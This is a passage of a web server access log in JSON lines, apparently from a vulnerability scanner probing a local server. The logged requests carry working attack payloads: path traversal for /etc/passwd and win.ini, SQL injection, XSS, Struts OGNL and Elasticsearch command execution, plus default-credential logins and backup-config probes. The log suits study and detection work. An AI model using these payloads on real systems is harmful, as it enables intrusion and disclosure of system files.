+0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/jsonws/invoke HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.396","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.346","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"{'jql':'project in projectsLeadByUser(\x2228fHqS1eRlSAHNi1EXtxGAgfNjI\x22)'}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /rest/issueNav/1/issueTable HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.775","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.364","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ReportServer/Pages/ReportViewer.aspx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.386","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v2/graphql-explorer HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.223","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ftpsync.settings HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.180","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jasperserver-pro/login.html?error=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.425","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.467","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /conn.php.bak HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.441","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.314","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/57 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.432","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.433","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.466","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /names.nsf HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.340","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /etc.children.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.517","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"username=admin&password=","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /htdocs/login/login.lua HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.521","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /fw.login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.346","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.426","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /anything_here HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.442","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.196","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /my.ppk HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.447","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /zimbraAdmin/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.399","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.385","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.493","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.247","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /db_config.php.bak HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.353","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.384","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /pagespeed-global-admin/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.368","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.414","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https%3a%2f%2fexample.com%2f HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.248","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.487","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /include/thumb.php?dir=http/.....///.....///config/config_db.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.333","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.442","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.468","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /sessions/new HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.511","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"username=admin&password=admin","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /carbon/admin/login_action.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.486","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.352","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.354","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /images/json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.419","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /404.php.bak HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.364","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"{\x0D\x0A \x22size\x22: 1,\x0D\x0A \x22query\x22: {\x0D\x0A \x22filtered\x22: {\x0D\x0A \x22query\x22: {\x0D\x0A \x22match_all\x22: {\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A },\x0D\x0A \x22script_fields\x22: {\x0D\x0A \x22command\x22: {\x0D\x0A \x22script\x22: \x22import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\x5C\x22cat /etc/passwd\x5C\x22).getInputStream()).useDelimiter(\x5C\x22\x5C\x5C\x5C\x5CA\x5C\x22).next();\x22\x0D\x0A }\x0D\x0A }\x0D\x0A}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /_search?pretty HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.351","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /log/view?filename=/windows/win.ini&base=../../../../../../../../../../ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.359","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /vkd/GetWelcomeScreen.event HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.377","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v2/graphql.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.940","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.401","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https:%0a%0dexample.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.386","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /final/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.461","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /include/thumb.php?dir=.....///http/.....///config/config_db.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.461","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.480","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.456","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /secure/popups/UserPickerBrowser.jspa HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.457","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /etc.children.1.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.915","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /web/database/selector/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.367","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-config.php.bak HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.372","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /owa/auth/x.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.373","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 